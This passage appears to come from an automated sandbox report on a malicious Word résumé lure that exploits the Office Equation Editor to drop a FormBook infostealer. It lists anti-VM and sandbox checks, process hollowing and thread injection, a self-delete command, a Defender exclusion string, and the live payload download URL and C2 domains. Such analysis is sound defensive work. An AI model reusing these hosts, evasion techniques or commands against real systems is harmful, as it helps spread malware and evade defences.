          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.drStream path '_1696858091/equatIoN naTivE' entropy: 7.99604139076 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 4.2.seasonhd72463.exe.25c09b0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: seasonhd72463.exe PID: 1812, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2564Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe TID: 1444Thread sleep time: -33027s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe TID: 1232Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1268Thread sleep time: -38000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00409AB0 rdtsc 5_2_00409AB0
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeThread delayed: delay time: 33027Jump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000006.00000000.443051975.000000000457A000.00000004.00000001.sdmpBinary or memory string: ort\0000pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7
          Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.443051975.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.443051975.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000006.00000000.510337596.000000000457A000.00000004.00000001.sdmpBinary or memory string: ort\0000pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idechJ
          Source: explorer.exe, 00000006.00000000.438642662.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000006.00000000.510449681.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00409AB0 rdtsc 5_2_00409AB0
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009726F8 mov eax, dword ptr fs:[00000030h]5_2_009726F8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025226F8 mov eax, dword ptr fs:[00000030h]7_2_025226F8
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0040ACF0 LdrLoadDll,5_2_0040ACF0
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.lenovoidc.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: B50000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeMemory written: C:\Users\user\AppData\Roaming\seasonhd72463.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeThread register set: target process: 1764Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 1764Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\seasonhd72463.exe C:\Users\user\AppData\Roaming\seasonhd72463.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess created: C:\Users\user\AppData\Roaming\seasonhd72463.exe C:\Users\user\AppData\Roaming\seasonhd72463.exeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\seasonhd72463.exe'Jump to behavior
          Source: explorer.exe, 00000006.00000000.425645466.0000000000750000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.679519269.0000000000B70000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
          Source: explorer.exe, 00000006.00000000.425645466.0000000000750000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.679519269.0000000000B70000.00000002.00020000.sdmpBinary or memory string: !Progman
          Source: explorer.exe, 00000006.00000000.425645466.0000000000750000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.679519269.0000000000B70000.00000002.00020000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeQueries volume information: C:\Users\user\AppData\Roaming\seasonhd72463.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery321Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information41DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 510259 Sample: C.V_Job Request.doc Startdate: 27/10/2021 Architecture: WINDOWS Score: 100 48 Multi AV Scanner detection for domain / URL 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 15 other signatures 2->54 10 EQNEDT32.EXE 11 2->10         started        15 WINWORD.EXE 291 20 2->15         started        process3 dnsIp4 40 binatonezx.tk 2.56.59.211, 49165, 80 GBTCLOUDUS Netherlands 10->40 32 C:\Users\user\AppData\...\seasonhd72463.exe, PE32 10->32 dropped 34 C:\Users\user\AppData\...\seasonzx[1].exe, PE32 10->34 dropped 70 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->70 17 seasonhd72463.exe 1 5 10->17         started        36 ~WRF{4A35DA17-E94D...C-120A276E213C}.tmp, Composite 15->36 dropped file5 signatures6 process7 signatures8 42 Multi AV Scanner detection for dropped file 17->42 44 Tries to detect virtualization through RDTSC time measurements 17->44 46 Injects a PE file into a foreign processes 17->46 20 seasonhd72463.exe 17->20         started        process9 signatures10 56 Modifies the context of a thread in another process (thread injection) 20->56 58 Maps a DLL or memory area into another process 20->58 60 Sample uses process hollowing technique 20->60 62 Queues an APC in another process (thread injection) 20->62 23 explorer.exe 20->23 injected process11 dnsIp12 38 www.lenovoidc.com 23->38 64 System process connects to network (likely due to code injection or exploit) 23->64 27 msiexec.exe 23->27         started        signatures13 process14 signatures15 66 Modifies the context of a thread in another process (thread injection) 27->66 68 Maps a DLL or memory area into another process 27->68 30 cmd.exe 27->30         started        process16

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          C.V_Job Request.doc51%VirustotalBrowse

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp100%AviraEXP/CVE-2017-11882.Gen
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\seasonzx[1].exe23%ReversingLabsByteCode-MSIL.Infostealer.Heye
          C:\Users\user\AppData\Roaming\seasonhd72463.exe23%ReversingLabsByteCode-MSIL.Infostealer.Heye

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.seasonhd72463.exe.59d818.2.unpack100%AviraHEUR/AGEN.1104764Download File
          5.0.seasonhd72463.exe.400000.9.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.seasonhd72463.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.seasonhd72463.exe.380000.0.unpack100%AviraHEUR/AGEN.1104764Download File
          7.0.msiexec.exe.b50000.0.unpack100%AviraHEUR/AGEN.1104764Download File
          5.2.seasonhd72463.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.seasonhd72463.exe.400000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.msiexec.exe.b50000.0.unpack100%AviraHEUR/AGEN.1104764Download File

          Domains

          SourceDetectionScannerLabelLink
          binatonezx.tk15%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://www.collada.org/2005/11/COLLADASchema9Done0%URL Reputationsafe
          http://java.sun.com0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://go.microsoft.c0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://binatonezx.tk/seasonzx.exe100%Avira URL Cloudmalware
          www.agentpathleurre.space/s18y/0%Avira URL Cloudsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          binatonezx.tk
          		2.56.59.211
          		truetrueunknown
          www.lenovoidc.com
          		unknown
          		unknowntrue
            		unknown

            Contacted URLs

